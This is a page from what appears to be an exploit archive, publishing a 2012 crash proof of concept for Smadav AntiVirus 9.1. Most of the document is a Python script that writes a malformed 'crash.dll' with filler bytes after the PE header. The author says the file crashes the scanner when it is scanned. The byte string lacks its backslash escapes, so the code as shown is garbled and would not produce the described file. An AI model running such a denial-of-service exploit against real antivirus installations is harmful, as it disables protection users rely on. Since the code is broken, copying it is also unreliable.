Smadav Anti Virus 9.1 Crash PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Smadav Anti Virus 9.1 Crash PoC
# Published : 2012-11-12
# Author :
# Previous Title : Microsoft Office Excel 2010 Crash PoC
# Next Title : IDA Pro 6.3 Crash PoC

# Exploit Title: Smadav AntiVirus - Crash PoC
# Date: 10/Nov/2012
# Exploit Author: Mada R Perdhana (mada@spentera.com) / Spentera Research
Team
# Vendor Homepage: http://www.smadav.net & http://www.smadav.web.id
# Software Link: http://www.smadav.net/download
# Version: 9.1 (Lastest Version, should be affected previous version)
# Tested on: Windows XP SP 2


The product will be crash when scanning a malicious .dll generate using
this script

----python--
file = open("crash.dll","wb")
file.write("x4dx5ax90x00x03x00x00x00x04x00x00x00xffxffx00x00xb8x41x41x41x41x41x41x41x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xf0x00x00x00x0ex1fxbax0ex00xb4x09xcdx21xb8x01x4cxcdx21x54x68x69x73x20x70x72x6fx67x72x61x6dx20x63x61x6ex6ex6fx74x20x62x65x20x72x75x6ex20x69x6ex20x44x4fx53x20x6dx6fx64x65x2ex0dx0dx0ax24x00x00x00x00x00x00x00x8cx9cx76x90xc8xfdx18xc3xc8xfdx18xc3xc8xfdx18xc3x4bxf5x45xc3xcbxfdx18xc3xc8xfdx19xc3x53xfdx18xc3x46xeax78xc3xdfxfdx18xc3x46xeax17xc3x85xfdx18xc3x46xeax47xc3xc7xffx18xc3x46xeax44xc3xc9xfdx18xc3x46xeax46xc3xc9xfdx18xc3x46xeax42xc3xc9xfdx18xc3x52x69x63x68xc8xfdx18xc3x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x50x45x00x00x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41")
file.close()
-------

The trick is by adding 49 bytes of malicious byte (represent with x41)
into the .dll file, right after the PE (x50x45) header on the 244th byte
of the file.